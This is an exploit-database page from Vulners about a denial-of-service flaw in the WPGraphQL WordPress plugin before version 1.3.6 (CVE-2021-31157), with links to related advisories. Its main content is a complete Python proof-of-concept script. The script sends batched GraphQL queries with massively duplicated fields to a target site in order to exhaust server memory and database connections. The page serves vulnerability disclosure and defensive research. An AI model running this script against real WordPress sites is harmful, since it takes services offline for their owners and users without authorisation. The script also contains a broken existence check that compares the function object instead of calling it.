Lucene search

K

WPGraphQL < 1.3.6 - Denial of Service

🗓️ 27 Apr 2021 00:00:00Reported by Dolev FarhiType 
wpexploit
 wpexploit
👁 529 Views

WordPress GraphQL 1.3.5 Denial of Service attack using field duplication and batched queries to cause server OOM and MySQL connection error

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
Patchstack
WordPress WPGraphQL plugin <= 1.3.5 - Denial of Service vulnerability
12 Apr 202100:00
patchstack
CVE
CVE-2021-31157
20 Apr 202219:48
cve
WPVulnDB
WPGraphQL < 1.3.6 - Denial of Service
27 Apr 202100:00
wpvulndb
"""
  This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors.
"""

import sys
import requests


def usage():
  print('* WordPress GraphQL 1.3.5 Denial of Service *')
  print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0]))
  print('python {} http://site.com 10000 100'.format(sys.argv[0]))
  sys.exit(1)

if len(sys.argv) < 4:
  print('Missing arguments!')
  usage()

def wpgql_exists():
  try:
    r = requests.post(WORDPRESS_URL, json='x')
    if 'GraphQL' in r.json()['errors'][0]['message']:
      return True
  except:
    pass
  return False

# This PoC assumes graphql is located at index.php?graphql
WORDPRESS_URL = sys.argv[1] + '/index.php?graphql'
FORCE_MULTIPLIER = int(sys.argv[2])
CHAINED_REQUESTS = int(sys.argv[3])

if wpgql_exists is False:
  print('Could not identify GraphQL running at "/index.php?graphql"')
  sys.exit(1)

queries = []

payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER
query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'}

for _ in range(0, CHAINED_REQUESTS):
  queries.append(query)

r = requests.post(WORDPRESS_URL, json=queries)
print('Time took: {} seconds '.format(r.elapsed.total_seconds()))
print('Response:', r.json())

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
27 Apr 2021 00:00Current
6.6Medium risk
Vulners AI Score6.6
529
.json
Report